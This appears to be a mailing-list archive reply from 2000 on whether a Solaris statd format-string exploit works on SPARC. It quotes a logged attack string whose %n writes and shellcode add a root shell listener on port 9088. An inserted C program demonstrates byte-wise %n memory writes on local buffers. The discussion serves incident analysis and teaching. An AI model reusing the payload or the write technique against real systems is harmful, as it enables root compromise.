Security Incidents mailing list archives
Re: Solaris statd exploit?
From: Fyodor <fygrave () SCORPIONS NET>
Date: Thu, 31 Aug 2000 06:35:17 -0400
Okay guys, let me make this clear for you (so at least part of your worries caused by kiddies' noise would go away): generally speaking, formatted string vulnerabilities are _NOT_ exploitable on SPARC platforms the way they are being exploited nowadays on x86. The problem is that due to alignment requirements you cannot shift the address per byte to write the return address, and due to libc limitations (at least on Solaris 7 and 2.6) you cannot write more than 4fc (last time I checked) bytes per call, which means that you cannot place a higher address. (Anyone who can prove that I am wrong, I'd be happy to hear this, honest! :)) So even if you assume that statd on Solaris has this sort of problem (which looks a lot like a fingerprint of the recently released Linux statd sploit), you can still sleep well if you're running it on SPARCs. :)

just my .02 :)
> I got this entry today on 3 different Solaris boxes... Is this some kind of statd exploit? The OS is Solaris 8 (and Solaris 2.6)... All of the entries have the same pattern and time (probably 1 or 2 seconds difference). A script kiddie attack?
>
> ----
> Aug 30 11:15:14 earth statd[236]: [ID 462824 auth.error] statd: attempt to create "/var/statmon/sm/%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%nK^v ^( ^ ^. #^1 F'F* FF+, NV1@/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i"
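The logged request above ends in four padded-field-then-%n pairs (%0242x%n%055x%n%012x%n%0192x%n), which is the byte-at-a-time write pattern the reply is discussing. The following C program is an added illustration, not code from this thread or from any statd exploit: it shows how %n turns "characters printed so far" into a stored value, and contrasts the two strategies the reply weighs against each other, four unaligned byte-wise stores with small padding widths versus one aligned store whose padding must reach the whole value. All targets are local buffers passed explicitly, so nothing walks the stack or corrupts memory it does not own. The helper names, the sample value 0xdeadbeef, and the DEMO_CAP bound are assumptions of this example; the 0x4fc figure is the per-call limit the reply quotes, read here as hexadecimal. The byte-wise path assumes a little-endian host that tolerates unaligned int stores (x86), which is exactly the property the reply says SPARC lacks.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Added example, not code from the thread. Assumptions: little-endian host
 * that allows unaligned 4-byte stores (x86); helper names are hypothetical. */

/* Width a "%0*x" of value 0 needs so that the running output count, taken
 * modulo 256, equals `want`. Printing 0 with width w emits exactly w chars. */
static int pad_for_byte(unsigned count_so_far, unsigned want)
{
    unsigned need = (want - count_so_far) & 0xff;
    return need ? (int)need : 256;
}

/* Strategy A (byte-at-a-time): four %n stores at target, target+1, target+2,
 * target+3. Each store writes a full int, so the high bytes of each count spill
 * past the byte we care about and are overwritten by the next store; `target`
 * must therefore have 8 bytes available. The last three stores are unaligned.
 * Every padding width stays at or below 256. Returns the characters emitted. */
int write_word_bytewise(uint8_t *target, uint32_t value)
{
    char out[1100];            /* four fields of at most 256 chars each */
    int w[4];
    unsigned count = 0;
    for (int i = 0; i < 4; i++) {
        w[i] = pad_for_byte(count, (value >> (8 * i)) & 0xff);
        count += w[i];
    }
    return snprintf(out, sizeof out, "%0*x%n%0*x%n%0*x%n%0*x%n",
                    w[0], 0, (int *)(target + 0),
                    w[1], 0, (int *)(target + 1),
                    w[2], 0, (int *)(target + 2),
                    w[3], 0, (int *)(target + 3));
}

/* Strategy B (single aligned store): one %n whose preceding field is as wide
 * as the value itself. Alignment is never an issue, but the padding width must
 * reach the full value, so a 32-bit address costs hundreds of millions of
 * characters. To keep the example fast, only values up to DEMO_CAP are
 * performed; anything larger returns -1 instead of printing. */
#define DEMO_CAP 4096
int write_word_single(uint32_t *target, uint32_t value)
{
    char out[DEMO_CAP + 1];
    if (value == 0 || value > DEMO_CAP)
        return -1;
    return snprintf(out, sizeof out, "%0*x%n", (int)value, 0, (int *)target);
}

int main(void)
{
    uint8_t buf[8] = {0};      /* 4 target bytes plus 4 bytes of spill room */
    uint32_t got, word = 0;
    const uint32_t sample = 0xdeadbeefu;   /* constructed sample value */

    int emitted = write_word_bytewise(buf, sample);
    memcpy(&got, buf, 4);
    printf("byte-wise: %d chars emitted, target now 0x%08x\n", emitted, got);

    int single = write_word_single(&word, 0x4fc);  /* the quoted cap, as hex */
    printf("single %%n: %d chars emitted, target now 0x%08x\n", single, word);
    printf("single %%n for 0x%08x would need %u chars in one field\n",
           sample, sample);
    return 0;
}
```

The byte-wise run emits 734 characters in total and leaves the four target bytes as ef be ad de, i.e. 0xdeadbeef when read as a little-endian word; the single-store path reaches 0x4fc with a 1276-character field but would need 3,735,928,559 characters for the sample value, which is the padding-width side of the trade-off the reply describes.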
Current thread:
- Solaris statd exploit? Hartoyo (Aug 31)
- Re: Solaris statd exploit? Fyodor (Aug 31)
- Solaris statd exploit? Klaus Moeller (Aug 31)
- <Possible follow-ups>
- Re: Solaris statd exploit? Thomas Dullien (Aug 31)